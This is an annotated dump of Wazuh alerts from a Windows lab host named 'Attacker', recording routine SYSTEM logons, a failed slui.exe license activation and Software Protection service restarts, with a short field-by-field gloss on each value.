data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: License activation (slui.exe) failed. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60646 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.95498 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 8198 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:56.4510372Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2365 Incremental log record number – handy for timeline order.
data.win.system.processID: 11828 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "License Activation (slui.exe) failed with the following error code:
hr=0x80004005
Command-line arguments:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533885.97820 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:40.9838207Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43462 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533885.105153 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:26.3848083Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2367 Incremental log record number – handy for timeline order.
data.win.system.processID: 1172 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:26Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-21T01:40:26Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533886.106732 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:47:15.5376499Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2371 Incremental log record number – handy for timeline order.
data.win.system.processID: 1948 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:15Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-21T01:40:15Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533886.108311 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:38:27.9148683Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43468 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533887.115645 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:47:48.6215646Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2373 Incremental log record number – handy for timeline order.
data.win.system.processID: 2116 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:48Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-21T01:40:48Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533887.117224 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:53:34.5100079Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2377 Incremental log record number – handy for timeline order.
data.win.system.processID: 3028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:34Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-21T01:40:34Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533888.118803 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:41:55.1493380Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43476 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
